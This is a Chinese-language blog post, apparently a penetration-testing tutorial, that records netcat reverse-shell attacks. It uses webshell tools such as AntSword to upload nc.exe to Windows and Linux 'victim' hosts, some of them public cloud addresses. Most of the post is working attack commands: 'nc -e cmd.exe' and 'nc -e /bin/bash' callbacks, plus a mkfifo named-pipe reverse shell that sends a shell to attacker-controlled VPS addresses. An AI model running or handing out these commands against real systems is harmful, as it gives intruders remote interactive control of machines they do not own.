NC 反彈Shell紀錄
作者 : Noth
前言 :
在滲透過程中,往往因爲被控端因防火牆受限、權限不足、端口被占用等情形限制而無法直連目標機器,此時需要通過反彈shell來獲取一個互動式 Shell,以便繼續深入 xD 真是牛逼得操作,我們直接實戰一次 !!
內容 :
實作環境 :
攻擊者 : 192.168.111.130 (Windows 10,內網)
攻擊者 : 192.168.111.128 (Kali,內網)
受害者 : 192.168.111.131 (Windows 2008,內網)
注 : 可提權或不提權都可反彈 Shell
攻擊者透過蟻劍上傳 nc.exe 到 C:/Windows/Temp 目錄
本地端 windows 10 監聽 :
nc64.exe -lvvp 443
受者者主機反彈 shell :
C:/Windows/Temp/nc64.exe 192.168.111.130 443 -e cmd.exe
成功反彈 shell :
nc64.exe -lvvp 443
提權後在進行反彈 shell
直接 system 權限
當然將 kali 當作監聽也是可以的
nc -lvvp 8080
實作環境 :
攻擊者 : 192.168.111.130 (Windows 10,內網)
攻擊者 : 192.168.111.128 (Kali,內網)
受害者 : 192.168.111.137 (Ubuntu,內網)
注 : 可提權或不提權都可反彈 Shell
攻擊者透過蟻劍連接後門,查對方主機是否有 NC,有的話毫不客氣,直接用它的 NC 來反彈 Shell xD
find / -name nc 2>/dev/null
本地端 windows 10 監聽 :
nc64.exe -lvvp 443
nc -e /bin/bash 192.168.111.130 443
成功反彈
當然 kali 也可以當作監聽
sudo nc -lvvp 443
不管是 Linux 、Windows 主機都可以拿來監聽 xD ,比較需要注意的是受害者要以什麼指令來進行反彈 Shell。
以上在內網可以直接彈一個交互式的 Shell,但在實戰的過程中往往需要一個公網的 VPS 來進行反彈 Shell xD,接下來我們直接嘗試用外網 VPS 進行反彈 Shell。
實作環境 :
攻擊者 : 192.168.111.130 (Windows10,內網)
攻擊者 : 51.68.120.185 (VPS1,Windows 10,外網)
攻擊者 : 35.222.168.245 (VPS2,Linux,外網)
受害者 : 35.184.250.37 (Google GCP ,Ubuntu,外網)
前提 : 受害者已經用一句話連接菜刀、蟻劍、冰蠍連接
查看對方主機是否有 NC,沒有的話直接上傳一個來反彈 Shell xD
find / -name nc 2>/dev/null
VPS1 上面進行監聽 :
nc64.exe -lvvp 1051
受害者進行反彈 Shell :
nc -e /bin/bash 51.68.120.185 1051 (失敗)
這是因為默認 Linux 的 nc 没有帶 -e (發送至性程序) 選項,可以通過命名管道的方式把 bash 通過 nc 反彈出来
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 51.68.120.185 1051 > /tmp/f
whoami :
VPS2 上面進行監聽 :
受害者進行反彈 Shell :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 35.222.168.245 1051 > /tmp/f
在 VPS2 中成功反彈 Shell (ifconfig) :
實作環境 :
攻擊者 : 192.168.111.130 (Windows10,內網)
攻擊者 : 51.68.120.185 (VPS,Windows 10,外網)
攻擊者 : 35.222.168.245 (VPS2,Linux,外網)
受害者 : 51.79.158.250 (Windows 2016,外網)
前提 : 受害者已經用一句話連接菜刀、蟻劍、冰蠍連接
攻擊者透過蟻劍上傳 nc.exe 到 C:/Windows/Temp 目錄
VPS1 開始監聽 :
nc64.exe -lvvp 1051
VPS1 成功彈回 Shell (Whoami) :
VPS2 成功彈回 Shell (ipconfig) :
以上是 NC 的用法 xD,接下來就讓各位小夥伴慢慢研究 ~! 寧靜致遠,希望學技術的小夥伴潛心去學,路才會走的長遠。
留言
張貼留言